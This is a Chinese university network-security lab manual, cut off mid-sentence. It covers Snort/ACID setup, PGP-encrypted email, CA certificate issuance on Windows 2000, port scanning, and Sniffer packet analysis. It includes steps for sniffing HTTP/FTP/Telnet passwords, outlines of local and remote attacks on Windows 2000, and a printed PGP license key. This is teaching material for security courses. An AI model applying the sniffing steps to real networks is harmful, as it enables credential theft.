网络与信息安全实训指导书

《网络与信息安全实训指导书》由会员分享，可在线阅读，更多相关《网络与信息安全实训指导书（39页珍藏版）》请在装配图网上搜索。

1、编号：时间：2021年x月x日书山有路勤为径，学海无涯苦作舟页码：第39页 共39页网络与信息安全实训指导书一、课程基本知识1、实训目的：网络与信息安全技术是信息管理与信息系统专业必修的一门专业课，而且网络与信息安全技术实训课程是一门实践性很强的课程，主要为配合网络安全的相关理论知识，以此为基础进行一系列的实际安全配置实验训练。在实训学习和实践过程中，学生以解决实际问题为主线，进行相关实际的网络安全配置和制定系统防范措施。学生通过对网络与信息安全技术课程的学习，已经初步掌握了网络安全技术中所涉及到的基础安全技术。为了加强网络与信息安全技术的基础，开设课程实训课，使学生对网络安全技术有更全面的理

2、解，进一步提高学生运用网络安全技术解决实际问题的能力，同时为后续课程的学习夯实基础。课程设计主要目的：(1)提高实际工作中配置和维护各种服务器的能力。(2)通过服务器的安全配置与维护，掌握网络中常见安全问题的解决方法。(3)对系统服务器进行入侵检测操作，能更好的掌握各种协议的应用。实训的任务主要是使得学生掌握网络与信息安全技术领域的基本理论和方法，具有较强的自律意识和信息安全意识，具有使用网络安全方面的软硬件产品解决实际问题的能力，能够完成一系列的实际安全配置实验内容，并且能够熟练使用相关安全工具和软件。2、实训内容：Windows下Snort的安装与配置、利用证书或PGP软件传输加密/签名的

3、邮件附件和正文、防病毒软件的使用、CA证书的安装、申请及在Web中的应用：证书申请和证书签发；基于SSL的安全Web服务配置；CRL签发；用户管理和证书查询、本地入侵Windows 2000系统、远程攻击Windows 2000系统、使用X-SCANNER扫描工具发现系统漏洞、用Sniffer软件抓取数据报,分析数据报、木马病毒的查杀、NC实验。3、实训所用设施：PC机 61台、交换机6台、Windows 2000 server操作系统、PGP软件、录像软件等4、实训任务及要求：根据提供的实训题目，引导学生采用正确的实验、实训方法，启发学生扩大解决问题的思路，从而得到正确的结果，并且分析出现的

4、各种现象，提高实验、实训效果。实训过程中，注意记录实训步骤。做完实验、实训，写出实验、实训报告。二、实训基本操作方法1、按照系统用户手册及文档规范要求进行操作，养成查阅手册、文档的良好习惯；2、根据实训步骤要求进行操作，注意积累正确操作方法；3、操作过程中注意记录错误提示，并利用各种资源进行更正，积累错误诊断经验，增强独立解决问题的能力；4、对特殊疑难问题采用讨论、协作等方式进行解决，有意识地训练团队合作意识；5、实训报告应多包含在实训过程中出现的错误及解决方法。三、实训项目（一） Windows下Snort的安装与配置(必做)1.安装Apache_2.0.46 For Windows安装的时

5、候注意，如果你已经安装了IIS并且启动了Web Server ，因为IIS的Web Server默认在TCP 80端口监听，所以会和Apache Web Server冲突，我们可以修改Apache Web Server为其他端口。选择定制安装，安装路径修改为c:apache 安装程序会自动建立c:apache2 目录，继续以完成安装。安装完成后在c:apache2confhttpd.conf中,将apache web server 默认端口80，修改为其他不常用的高端端口：修改Listen 80 为Listen 50080 安装apache为服务方式运行,在DOS状态下,输入并运行命令：c:a

6、pache2binapache -k install2.安装PHP1）添加Apache对PHP的支持：解压缩php-4.3.2-Win32.zip至c:php2）拷贝php4ts.dll至%systemroot%system32；拷贝php.ini-dist至%systemroot%system32和%systemroot%下,并改名为php.ini将phpextensions下的php_gd2.dll和php_bz2.dll拷贝到%systemroot%system32下3）添加gd 图形库支持：修改php.ini中：extension=php_gd2.dll (可以直接添加，也可以将原有这

7、句话前的“；”删除)4）在c:apache2confhttpd.conf 中添加LoadModule php4_module c:/php/sapi/php4apache2.dll AddType application/x-httpd-php .php5）启动Apache 服务 net start apache2 6）在c:apache2htdocs 目录下新建test.php ， test.php 文件内容： 使用http:/127.0.0.1:50080/test.php 测试php是否安装成功 （备注：%systemroot%下存储表示在winnt下存储）3.安装snort安装Snor

8、t_2_0_0使用默认安装路径c:snort4. 安装Mysql 1)安装Mysql，默认安装Mysql至c:mysql 2)安装mysql为服务方式运行 命令行c:mysqlbinmysqld-nt install 3)启动mysql服务net start mysql4)连接MYSQL。 格式： mysql -h主机地址 -u用户名 p用户密码 首先在打开DOS窗口，然后进入目录 mysqlbin，再键入命令mysql u root -p，回车后提示你输密码，如果刚安装好MYSQL，超级用户root是没有密码的，故直接回车即可进入到MYSQL中了，MYSQL的提示符是：mysql （注:u与

9、root可以不用加空格，其它也一样）5)建立snort 运行必须的snort 库和snort_archive 库 mysqlcreate database snort; mysqlcreate database snort_archive; 6)输入quit退出musql，以root身份，使用c:snortcontrib 目录下的create_mysql 脚本建立Snort 运行必须的数据表 c:mysqlbinmysql -D snort -u root -p c:snortcontribcreate_mysqlc:mysqlbinmysql -D snort_archive -u root

10、 -p grant usage on *.* to “acid”“localhost” identified by “acidtest”; mysql grant usage on *.* to “snort”“localhost” identified by “snorttest”; 8)为acid 用户和snort 用户分配相关权限mysql grant select,insert,update,delete,create,alter on snort .* to acidlocalhost;mysql grant select,insert on snort .* to snortloc

11、alhost; mysql grant select,insert,update,delete,create,alter on snort_archive .* to acidlocalhost;5.安装adodb 解压缩adodb360.zip 至c:phpadodb 目录下6. 安装acid解压缩acid-0.9.6b23.tar.gz 至c:apache2htdocsacid 目录下修改acid_conf.php 文件 $DBlib_path=c:phpadodb$DBtype = mysql; $alert_dbname=snort; $alert_host=localhost; $a

12、lert_port=3306; $alert_user=acid; $alert_password=acidtest;/* Archive DB connection parameters */ $archive_dbname=snort_archive; $archive_host=localhost; $archive_port=3306; $archive_user=acid; $archive_password=acidtest ; $ChartLib_path=C:phpjpgraphsrc;建立acid 运行必须的数据库：http:/127.0.0.1:50080/acid/aci

13、d_db_setup.php,按照系统提示，单击create ACID AG建立数据库7.安装jpgrapg 库 解压缩jpgraph-1.12.2.tar.gz 至c:php jpgraphsrc下的jpgraph.php文件，去掉下面语句的注释DEFINE(CACHE_DIR,/tmp/jpgraph_cache/);8.安装winpcap按照默认安装即可9.配置Snort（1）编辑c:snortetcsnort.conf，需要修改的地方：include classification.configinclude reference.config改为绝对路径include c:snortet

14、cclassification.configinclude c:snortetcreference.config（2）设置snort 输出alert 到mysql server，在文件的最后加入如下语句Output database:alert, mysql, host=localhost user=snort password=snorttest dbname=snort encoding=hex detail=full（3）测试snort 是否正常工作： 命令行：c:snortbinsnort -c c:snortetcsnort.conf -l c:snortlog -d -e X -X

15、 参数用于在数据链接层记录raw packet 数据 -d 参数记录应用层的数据 e 参数显示记录第二层报文头数据 -c 参数用以指定snort 的配置文件的路径（4）打开http:/ip:50080/acid/acid_main.php进入acid的分析控制台主界面。（二） 利用证书或PGP软件传输加密/签名的邮件附件和正文1、配置outlook express：如果要想真正实现加密邮件的传输，需要在配置过程中输入真实的email地址（提示：一旦起用outlook express进行邮件收发，则web邮箱中的邮件将都被下载到outlook中，所以为了能更好的做此实验，最好是重新申请一个新邮箱

16、） 具体步骤： 打开outlook express-“工具”菜单中的“帐户”-添加-邮件-在“您的姓名”页的显示名处输入“姓名，如lf”-在“internet电子邮件地址”页中输入自己真实的mail地址,如ghz1-在“电子邮件服务器”页中，输入：接收邮件“”和发送邮件“”-在“internet邮件登录”页中输入真实登录邮件的用户名和密码-完成。选中添加的帐户-属性-在“常规”选项卡中，将“”修改为lf- 在“服务器”选项卡中，将“我的服务器要求身份验证”选中-确定。此时outlook express配置完成，并可以测试是否能正常进行通信。2、安装PGP软件在安装完毕后，一定要重新启动计算机。

17、重启后，需要对PGP进行配置，配置信息参考licenseinfo.txt文件，即为： 用户名：User 2004 组织名：Group 2004 License Number:：CUPVJ-RMRME-N4MYZ-M1ZUQ-26CWD-M0ALicense Authorization中输入下面的全部内容：-BEGIN PGP LICENSE AUTHORIZATION-ADIAApAAAKCZEwROEfJ2khJVeBe7UZ9FSHkHGwCeOkt8cL0Qk3CNGFSp3dEtVcGc4Hs=-END PGP LICENSE AUTHORIZATION-3、生成公私钥对，具体步骤打开

18、安装的PGP软件-“keys”菜单中选择“new keys”-“expert”-按照向导继续配置下去即可。4、导出自己的密钥右击自己创建的密钥-选择“export”-选择保存位置和保存名称-确定5、把密钥传输给另一个人（需要打开你加密邮件正文或附件的用户）通过邮件的方法可以传输可以通过网上邻居传输6、将接收到的密钥导入到自己的keys中对方接收到密钥以后，将其导入到自己的“PGPkeys”中，然后选择刚导入的公钥，单击“keys”菜单中的“sign”-在图1中可以选择其他配置信息，单击“ok”-在图2中输入本人的私钥密码-点击“ok”，此时表示对方的公钥已经被导入进来。图1图27、利用PGP加

19、密邮件附件右击要加密的邮件附件-选择“PGP”中的“encrypt”打开如图3所示对话框，在这里把对方的公钥从上面的对话框中拖到下面的对话框，如图4所示结果。-选择上对方的公钥，单击“ok”，即对文件进行了加密。图3图4 打开outlook -新建邮件-输入收件人地址-到加密的邮件附件添加进来，并发送给对方即可。8、对加密附件进行解密 把邮件附件保存到本机-右击该附件-选择“PGP”中的“decypt”-输入私钥密码-确定即可。（三） 防病毒软件的使用使用RAV瑞星或KV300等杀毒软件的有关杀毒功能，检测Windows 2000/XP网络系统，将检测结果和使用步骤写成实训报告。在网络上搜索目

20、前流行的杀毒软件，并下载一些共享软件或试用版使用。思考：恶性病毒的破坏作用主要有哪些？比较目前流行的杀毒软件的特点。（四） CA证书的安装、申请及在Web中的应用：证书申请和证书签发；基于SSL的安全Web服务配置；CRL签发；用户管理和证书查询（必做）1、实验目的通过观察和动手实验，使学生更深入理解PKI公钥基础设施中数字证书的作用，以win2000 server CA中心为例，学会客户端如何从独立CA中心申请数字证书，CA中心如何签发证书。2、实验原理2.1 PKI基础PKI (Pubic Key Infrastructure)是一个用公钥密码学技术来实施和提供安全服务的安全基础设施，它是

21、创建、管理、存储、分布和作废证书的一系列软件、硬件、人员、策略和过程的集合。PKI基于数字证书基础之上，使用户在虚拟的网络环境下能够验证相互之间的身份，并提供敏感信息传输的机密性、完整性和不可否认性，为电子商务交易的安全提供了基本保障。一个典型的PKI系统应包括如下组件： （1）安全策略 安全策略建立和定义了组织或企业信息安全方面的指导方针，同时也定义了密码系统使用的处理方法和原则。（2）证书操作阐述CPS（Certificate Practice Statement）一些PKI系统往往由商业证书发放机构(CCA)或者可信的第三方来对外提供服务，所以需要提供CPS给其使用者参考，以供其了解详细

22、的运作机理。CPS是一些操作过程的详细文档，一般包括CA是如何建立和运作的，证书是如何发行、接收和废除的，密钥是如何产生、注册和认证的等内容。 （3）证书认证机构CA（Certificate Authority） CA系统是PKI的核心部分，因为它管理公钥的整个生命周期。CA的作用主要包括如下几个方面：发放证书，用数字签名绑定用户或系统的识别号和公钥。 规定证书的有效期。 通过发布证书废除列表（CRL）确保必要时可以废除证书。 （4）注册机构RA（Registration Authority） RA是CA的组成部分，是用户向CA申请服务的注册机构，它负责接收用户的证书申请，审核用户的身份，并为

23、用户向CA提出证书请求，最后将申请的证书发放给用户。（5）证书分发系统CDS（Certificate Distribution System）证书通过证书分发系统对外公开发布，用户可在此获取其它用户的证书。证书的发布可以有多种途径，比如，用户可以自己发布，或是通过目录服务器向外发布。（6）基于PKI的应用接口 PKI是一个安全框架，它的价值在于使用户能够方便地使用加密、数字签名等安全服务，为此一个完整的PKI必须提供良好的应用接口，可以在此基础上提供多种安全应用服务。2.2 数字证书数字证书相当于我们平常使用的身份证，身份证用于标明使用者的身份，数字证书是各类终端实体和最终用户在网上进行信息交

24、流及商务活动的身份证明，在电子交易的各个环节，交易的各方都需验证对方数字证书的有效性，从而解决相互间的信任问题。数字证书是经证书认证机构数字签名的，包含用户身份信息、用户公开密钥信息的一个文件。由于证书是由证书认证机构颁发的，有证书认证机构的数字签名，所以证书的拥有者是被证书认证机构所信任的。如果可以信任证书认证机构，则完全可以信任证书的拥有者。所以通过证书，可以使证书的拥有者向系统中的其它实体证明自己的身份。数字证书的存储格式标准有多种，X.509是最基本的证书存储标准格式。X.509格式的数字证书结构如下图所示。证书的版本证书序列号签名算法标识证书签发机构名证书有效期证书持有者用户名证书用

25、户公钥信息签发者唯一标识符证书持有者唯一标识符签名值图4.1 X.509格式的数字证书结构各项具体内容包括：证书的版本号（Version）：0表示X.509 V1 证书标准；1表示X.509 V2 证书标准；2表示X.509 V3 证书标准。证书序列号（SerialNumber）：签发机构分配给证书的一个唯一标识号，同一机构签发的证书不会有相同的序列号。签名算法（Signature）：包含算法标识和算法参数，标明证书签发机构用来对证书内容进行签名的算法。证书签发机构名（Issuer）：用来标识签发证书的CA的名字，包括其国家、省市、地区、组织机构、单位部门和通用名。证书有效期（Validity

26、）：包含两个日期，一个是证书开始生效的日期，一个是证书有效的截止日期。当前日期在证书有效期之内时，证书的有效性验证才能通过。 证书用户名（Subject）：证书所有者的甄别名。包括国家、省市、地区、组织机构、单位部门和通用名，还可包含email地址。证书用户公钥信息（subjectPublicKeyInfo）：包含用户公钥算法和公钥的值。签发者唯一标识符（Issuer Unique Identifier）。签发者唯一标识符在第2版加入证书定义中。此域用在当同一个X.500名字用于多个认证机构时，用一比特字符串来唯一标识签发者的X.500名字。该项可选。 证书持有者唯一标识符（Subject U

27、nique Identifier）。持有证书者唯一标识符在第2版的标准中加入X.509证书定义。此域用在当同一个X.500名字用于多个证书持有者时，用一比特字符串来唯一标识证书持有者的X.500名字。可选 签名值（Issuers Signature）。证书签发机构对证书上述内容的签名值。除了X.509标准之外，数字证书的存储标准还有PKCS#7、PKCS#12等标准。其中，PKCS#7 标准是用来传输签名数据的标准格式；PKCS#12标准是用来传输证书和私钥的标准格式。2.3 CA系统如果将数字证书比喻为出差时能证明我们身份的“介绍信”，那么CA就好比开出“介绍信”的工作单位，它能证明证书持有

28、者的身份。在互联网上，CA定义为：一个可信实体，发放和作废公钥证书，并对各作废证书列表签名。证书认证机构CA（Certification Authority）是PKI的核心部分，用于创建和发放数字证书。创建证书的时候，CA系统首先获取用户的请求信息，其中包括用户公钥（公钥一般可由用户端产生，如电子邮件程序或浏览器等）等。CA将根据用户的请求信息产生证书，并用自己的私钥对证书进行签名。证书在使用过程中，其他用户、应用程序或实体需下载安装CA根证书，使用CA根证书中的公钥对CA颁发的证书进行验证，如果对证书中CA的数字签名验证通过，则证明这个证书是CA签发的。进一步来说，如果一个CA系统是可信的，

29、则此证书的拥有者也是可信的。3、CA系统的结构一个典型的CA系统包括安全服务器、登记中心RA服务器、CA服务器、LDAP目录服务器和数据库服务器等。（1）安全服务器 安全服务器面向普通用户，用于提供证书申请、浏览、证书撤消列表以及证书下载等安全服务。安全服务器与用户的的通信采取安全信道方式（如SSL的方式，不需要对用户进行身份认证），从而保证了证书申请和传输过程中的信息安全性。 （2）CA服务器 CA服务器是整个证书机构的核心，负责证书的签发。CA服务器是整个结构中最为重要的部分，存有CA的私钥以及发行证书的脚本文件。出于安全的考虑，应将CA服务器与其他服务器隔离，所有通信采用人工干预的方式，

30、确保认证中心的安全。（3）登记中心RA 登记中心服务器面向登记中心操作员，在CA体系结构中起承上启下的作用，一方面向CA转发安全服务器传输过来的证书申请请求，另一方面向LDAP服务器和安全服务器转发CA颁发的数字证书和证书撤消列表。 （4）LDAP服务器 LDAP服务器提供目录浏览服务，其他用户通过访问LDAP服务器就能够得到其他用户的数字证书。 （5）数据库服务器 数据库服务器是认证机构中的核心部分，用于认证机构数据（如密钥和用户信息等）、日志和统计信息的存储和管理。4、CA系统的主要功能 CA系统的主要功能是对证书进行管理，包括颁发证书、废除证书、更新证书、验证证书、管理密钥等。（1）颁发

31、证书从使用者角度来看，证书可以分为系统证书和用户证书，系统证书是指CA系统自身使用的证书，例如最高层的根CA自身的根证书等；用户证书按照应用的角度又可以分为个人用户证书、企业用户证书和服务器证书等。颁发证书的流程如下：首先用户到CA的注册机构RA或业务受理点或通过web网站等提交证书申请。如果用户自己产生公私钥对，证书申请中包含了个人信息和公钥；如果由CA产生公私钥，则证书申请中只包含个人信息。接着RA等机构对用户的信息进行审核，审核用户的相关关键资料和证书请求中是否一致，更高级别的证书需要CA进行进一步的审核。审核通过后，CA为审核此用户签发证书，证书可以灌制到证书介质中，发放给用户；或者将

32、证书发布到LDAP服务器上，由用户下载并安装证书。（2）废除证书证书的废除是指证书在到达它的使用有效期之前将不再使用，废除证书的原因有多种，例如：证书用户身份信息的变更，CA签名私钥的泄漏，证书对应私钥的泄漏，证书本身遭到损坏，以及其他多种原因。废除证书的过程如下：用户到CA的业务受理点申请废除证书，CA审核用户的身份后，将证书吊销，并将吊销的证书加入到证书黑名单CRL（Certificate Revocation List）中，CRL是由CA认证中心定期发布的具有一定格式的数据文件，它包含了所有未到期的已被废除的证书（由CA认证中心发布）信息。CA会临时或者定期签发证书黑名单CRL，并将更新

33、的CRL通过LDAP目录服务器在线发布，供用户查询和下载。（3）证书的更新当用户的私钥被泄漏或证书的有效期快到时，用户应该更新私钥。这时用户可以申请更新证书，以废除原来的证书，产生新的密钥对和新的证书。证书更新的操作步骤与申请颁发证书的类似。（4）证书验证证书验证的内容包括三部分：验证有效性，即证书是否在证书的有效使用期之内？证书有效性的验证是通过比较当前时间与证书截止时间来进行的。验证可用性，即证书是否已废除？证书可用性的验证是通过证书撤销机制来实现的。验证真实性，即证书是否为可信任的CA认证中心签发？证书真实性的验证是基于证书链验证机制的。例如对于级联模式的CA结构，如图1.2所示。它是按

34、照主从CA关系建立的分级结构，类似于树形结构，根CA是最高级别的也是最可信任的CA，位于树的顶端，根CA的下一层是子CA。通常根CA不直接为最终用户颁发证书，而只为子CA颁发证书。子CA为为最终用户颁发证书，子CA可以按照所颁发证书用途的不同有多个，子CA也可有更下层的子CA。最终用户在上述树形结构中处于树叶的位置。在这个级联模式的结构中，建立的是自上而下的信任链，下级CA信任上级CA，下级CA由上级CA颁发证书并认证，如果一个终端实体信任一个根CA，通过证书链传递信任，那么该实体可以信任根CA所属子CA中的最终用户。（5）管理密钥CA系统提供了基于密钥的管理功能，包括密钥的产生、密钥的备份和

35、恢复，以及密钥的更新等。根据证书类型和应用的不同，密钥对的产生有不同的形式和方法。对普通证书和测试证书，一般由浏览器或固定的终端应用来产生，这样产生的密钥强度较小，不适合应用于比较重要的安全网络交易。而对于比较重要的证书，如商家证书和服务器证书等，密钥对一般由专用应用程序或CA中心直接产生，这样产生的密钥强度大，适合于重要的应用场合。在一个CA系统中，维护密钥对的备份至关重要，如果没有这种措施，当密钥丢失后，将意味着加密数据的完全丢失，对于一些重要数据，这将是灾难性的。所以，密钥的备份和恢复也是密钥管理中的重要一环。当用户密钥不慎丢失或者被破坏时，可以为用户及时恢复密钥。密钥的使用都有一定的期

36、限，密钥到期后会自动失效，所以密钥应该定时更新。在密钥泄漏时，也需要及时更新密钥，以保证证书应用过程中的安全性。5、实验环境硬件：用作CA中心的PC机一台，用作客户端申请证书的PC机至少一台。软件：CA中心预装win2000 server，（可能需要安装光盘，或者安装光盘内容已经拷入硬盘），客户端预装win 2000 。6、实验步骤（1）在装有win2000 server的服务器上安装独立的根CA中心。1）点击“开始”按钮，选择“设置”-“控制面板”-“添加和删除程序”，在弹出的窗口中选择“添加和删除WINDOWS组件”。注意，安装的过程中可能需要系统安装盘。在弹出的窗口中，选择“证书服务”，

37、这时候会弹出一个对话框，点击确定，然后点击“下一步”开始安装。2）在弹出的配置窗口中，选择“独立根CA”，并点击“下一步”3）在弹出的窗口中填入数据的存放位置，点击“下一步”。4）这样会停止本机在Internet上运行的信息服务，即完成了证书安装。证书安装后，Internet上运行的信息服务会自动开启。单击“开始”，选择“程序”-“管理工具”，此时可在该菜单中找到“证书颁发机构”，说明CA的安装已经完成（2）通过WEB页面申请证书1）在用作证书申请客户端的计算机中打开IE，在地址栏中输入 http:/根CA的IP/certsrv，其中的IP指的是建立根CA的服务器IP地址。选中“申请证书”，并

38、点击“下一步”，以从CA申请证书。2）在弹出的页面中选中“用户证书申请”中的“Web浏览器证书”。3）在弹出的窗口中填写用户的身份信息，完成后点击“提交”。在这种情况下，IE浏览器采用默认的加密算法生成公私钥对，私钥保存在本地计算机中，公钥和用户身份信息按照标准的格式发给CA服务器4）选择“是”，之后弹出页面。5）CA服务器响应后，出现证书挂起页面，表示CA服务器已经收到证书申请，需要进行处理后才能反馈。表示证书申请已经完成，等待根CA发布该证书。（3）证书发布1）在根CA所在的计算机上，单击“开始”，选择“程序”-“管理工具”-“证书颁发机构”。在弹出的窗口左侧的菜单目录中选择“待定申请”，

39、上一步中申请的证书web cert出现在窗口右侧。2）在证书上单击右键，选择“所有任务”-“颁发”，进行证书颁发 3）证书颁发后将从“待定申请”文件夹转入到“颁发的证书”文件夹中，表示证书颁发完成7、证书的下载安装（1）在申请证书的计算机上打开IE浏览器，在地址栏中输入 http:/根CA的IP/certsrv，进入证书申请页面。选择“检查挂起的证书”，查看CA是否颁发了证书，单击“下一步”；（2）在弹出的页面中选择已经提交的证书申请，单击“下一步”（3）如果颁发机构已将证书颁发，则将弹出页面。（4）单击“安装此证书”，系统提示，这是由于没有下载安装CA系统的根证书，在（6）中我们会安装CA的

40、根证书。（5）在这里先点击“是”，完成证书安装，显示页面。（6）由于没有下载安装CA系统的根证书，所以无法验证此CA系统颁发的证书是否可信任。为此需要安装CA系统的根证书，在地址栏中输入 http:/根CA的IP/certsrv，进入证书申请页面。选择“检索CA证书或证书吊销列表”，在弹出的窗口中单击“下载CA证书”超级连接。在弹出的文件下载对话框中选择恰当的保存路径，将证书保存在本地。（7）下载完毕后，在证书保存目录中双击此证书可查看证书信息。单击“安装证书”键，则进入证书导入向导，采用默认设置完成证书的导入，导入成功后，单击“确定”键即可。至此，我们web客户端的证书申请。需要说明的是，因

41、为证书的特殊性，存储的物理区域对用户透明，即“导入”的证书存储位置一般不显示，我们可以把它“导出”到可见的存储区，但是，私钥不能导出。没有导出到可见存储区的证书，我们可以通过打开IE浏览器，选择菜单中的“工具”“Internet选项”“内容”“证书”来查看证书的信息。8、实验报告要求配置独立CA系统，申请用于电子邮件加密的数字证书，提交实验步骤和结果。（五） 本地入侵Windows 2000系统（1）实训时每两个人一组，一个人为黑客，另一个人为管理员，以Windows2000系统为基础做攻击与防范训练。（2）在实训的过程中，注意记录实训步骤。写出实训报告，同时提出针对本地攻击Windows 2

42、000的防护措施（六） 远程攻击Windows 2000系统1、实训要求（1）下载黑客扫描程序（2）学习使用黑客扫描程序。（3）学习使用Windows 2000的Ping命令、Tracer命令、Host命令和NET命令收集目标主机的相关信息。2、实训内容（1）学习在客户端Windows 98和MS-DOS环境使用Ping 命令、Tracer命令、Host命令和NET命令收集目标主机的相关信息。（2）利用课堂上介绍的方法入侵Windows 2000系统。（3）在做实训前，写好实训方案。（4）实训过程中，注意记录实训步骤。（5）写出实训报告，同时针对Windows 2000的远程攻击提出防护措施。

43、（七） 使用X-SCANNER扫描工具发现系统漏洞通过使用网络端口扫描器(如：Fluxay、superscan、winsan2、X-Scan-v3.1-cn等)，可以了解目标主机开放的端口和服务程序，从而获取系统的有用信息，发现网络系统的安全漏洞。 sniffer：捕获http口令和ftp口令步骤： 第一步：先输入用户名和password 第二步：启动sniffer，且处于抓信息状态 第三步：登陆http或ftp（八） 用Sniffer软件抓取数据报,分析数据报1实验目的（1）熟悉嗅探软件使用。（2）通过实验掌握SNIFFER工具的安装及使用，理解TCP/IP 协议中TCP、IP、ICMP 数

44、据包的结构，了解网络中各种协议的运行状况。2实验原理Sniffer即网络嗅探器，用于监听网络中的数据包，分析网络性能和故障。Sniffer主要用于网络管理和网络维护，系统管理员通过Sniffer可以诊断出通过常规工具难以解决的网络疑难问题，包括计算机之间的异常通讯、不同网络协议的通讯流量、每个数据包的源地址和目的地址等，它将提供非常详细的信息。通常每个网络接口都有一个互不相同的硬件地址(MAC)，同时，每个网段有一个在此网段中广播数据包的广播地址（代表所有的接口地址）。一般情况下，一个网络接口只响应目的地址是自己硬件地址或者自己所处网段的广播地址的数据帧，并由操作系统进一步进行处理，而丢弃不是

45、发给自己的数据帧。而通过Sniffer工具，可以将网络接口设置为“混杂” (promiscuous)模式。在这种模式下，网络接口就处于一个对网络进行“监听”的状态，而它可以监听此网络中传输的所有数据帧，而不管数据帧的目标地址是广播地址还是自己或者其他网络接口的地址了。它将对遭遇的每一个数据帧产生硬件中断，交由操作系统对这个帧进行处理，比如截获这个数据帧，进而实现实时分析数据帧中包含的内容。当然，如果一个数据帧没有发送到目标主机的网络接口，则目标主机将无法监听到该帧。所以Sniffer所能监听到的信息将仅限于在同一个物理网络内传送的数据帧，就是说和监听的目标中间不能有路由（交换）或其他屏蔽广播包

46、的设备。因此，当Sniffer工作在由集线器(HUB)构建的广播型局域网时，它可以监听到此物理网络内所有传送的数据；而对于由交换机(switch)和路由器(router)构建的网络中，由于这些网络设备只根据目标地址分发数据帧，所以在这种网络中，sniffer工具就只能监测到目标地址是自己的数据帧再加上针对广播地址的数据帧了。Sniffer工作在OSI模型中的第2层，它一般使用在已经进入对方系统的情况。实验中要注意，虽然sniffer能得到在局域网中传送的大量数据，但是不加选择的接收所有的数据包，并且进行长时间的监听，那么你需要分析的数据量将是非常巨大的，并且将会浪费大量硬盘空间。Sniffer

47、工具分为软件和硬件两大类，在这里我们主要以Sniffer Pro软件为例对sniffer工具的使用方法和功能进行简单介绍。当然，sniffer软件工具还有很多种，例如SQLServerSniffer、FsSniffer等，它们的功能和使用的环境有所不同，如果读者感兴趣，可以自己进行深入探索。对于Sniffer工具的防范可以从以下几个方面进行：首先，如果通过网管工具发现在局域网内存在长时间占用较大带宽的计算机，这台计算机可能在进行嗅探；其次，Sniffer的记录文件增长很快，通过分析文件系统大小的变换情况，可以找到这个文件；最后，如果计算机的网络接口处于混杂模式下（在UNIX环境下通过ifcon

48、fig a命令查看网络接口状态），则它很可能运行了Sniffer。通过上面的几种方法，可以对Sniffer进行分析监测。除了这些间接分析方法外，还可以利用AntiSniff工具，它提供了直接检测Sniffer的功能，从而可以对Sniffer进行有效防范。Sniffer Pro软件简介：Sniffer软件是NAI公司推出的功能强大的协议分析软件，实验中使用Sniffer Pro4.7来截获网络中传输的FTP、HTTP、Telnet等数据包，并进行分析。3实验环境硬件：两台安装Windows 2000/XP的PC机，在其中一台上安装Sniffer Pro软件。将两台PC机通过HUB相连，组成一个局

49、域网。软件：Sniffer Pro软件。4实验步骤（1）将SNIFFER 安装在本机WINDOWS 2000 /XP（192.168.0.245）上 图8.4 安装界面（2）安装完成。 图8.5 安装完成（3）启动SNIFFER PRO 软件启动Sniffer Pro软件后可以看到它的主界面，如图8.6，启动的时候有时需要选择相应的网卡（adapter），选好后即可启动软件。菜单工具栏主窗口图8.6 主界面 工具栏简介，如图8.7捕获报文快捷键网络性能监视快捷键 图8.7 工具栏 网络监视面板简介 Dashboard可以监控网络的利用率，流量及错误报文等内容，如图8.8：统计平均数据或总和 图

50、8.8 Dashboard界面 图8.9 dashboard界面从Host table可以直观的看出连接的主机，如图8.10，显示方式为IP连接的主机的IP图8.10 Host Table界面（4）定义过滤器来捕捉192.168.0.40 上的IP 数据包如图8.11所示，然后点击OK。 图8.11 定义过滤规则 图8.12 定义嗅探地址（5）从SNIFFER 软件中MONITOR 菜单中点击MATRIX 命令，图8.13显示了192.168.0.40 的通信情况，并通过右键点击该地址，在快捷菜单中点击CAPTURE 命令开始捕捉。 图8.13 显示通信情况（6）一会儿停止捕捉后，选择DECO

51、DE 选项，查看捕捉到的IP 包，如图8.14所示： 图8.14 解码数据包（7）从下图8.15可以看出有三个窗口，最上的窗口是捕捉的数据，中间的窗口是数据分析，最下面的窗口是原始数据包，用16 进制表示，例如，TCP SOURCE PORT=1282 对应下面的05 02 。 图8.15 数据分析窗口（8）从窗口中可以看出：IP 数据包封装在TCP 数据包的前面。 图8.16 数据分析窗口 （9）IP 数据包头的结构示意图8.17。 图8.17 IP头结构示意图 图8.18 查看IP头（10）TCP 的结构示意 图8.19 TCP包解码 图8.20 TCP包结构（11）定义过滤器来捕捉192

52、.168.0.40 的ICMP 数据包。 图8.21 定义过滤规则（12）从本机192.168.0.245 PING 192.168.0.40 图8.22 ping目标主机 图8.23 网络连接情况（13）停止捕捉后从DECODE 窗口中找出ECHO 及ECHO REPLY 数据包 图8.24 解码ICMP包（14）分析ICMP 数据包头号信息 图8.25 ICMP包具体结构ICMP 类型：8 代码：0 校验和395C(正确) 确认号：1024 序号：4096 数据长度：32 字节实验总结： SNIFFER 是一个强大的捉包工具，数据包分析功能强大，如果正确使用，对于分析、定位网络故障十分有用

53、； 同时SNIFFER 工具由于功能强大，甚至可以充当HCAKER 工具，因为很多协议是明文传输，如FTP、TELNET 等，通过SNIFFER 工具可以查看用户名和密码。从OSI 结构上看，IP 包属于三层网络层，TCP 包是属于四层传输层，在数据包中IP 头在TCP 头的前面。从实验中可以清晰看出TCP 的三次握手过程。由实验我们可以看出，Sniffer可以探查出局域网内流动的任何信息，尤其是用户名和密码之类敏感的数据，所以在局域网内的安全就至关重要了，其实只要在电脑内安装上网络防火墙，并把Windows操作系统的安全级别提高，Sniffer工具就可能嗅探不到任何信息。5实验报告要求用两台

54、主机做实验，一台主机进行Telnet登陆，另一台主机进行嗅探，把嗅探到的重要信息写出来，尤其是用户名和密码。用两台主机做实验，一台主机进行tcp通信，另一台主机进行嗅探，把嗅探到的包解码，观察三次握手过程的实现。嗅探信息时所得到的数据包太多，既占用主机的硬盘资源，分析起来又极其麻烦，其实可以设置Define Filter选项中的Data Pattern，这个功能可以设置更加详细的过滤选项而使我们用最少的数据包得到最有用的数据，请自己做实验并研究怎样设置这些选项，并把实验重新做一遍，以得到少而有用的数据包，把设置的详细步骤和最终结果写出来。用两台主机做实验，在一台主机上安装上防火墙，另一台主机再

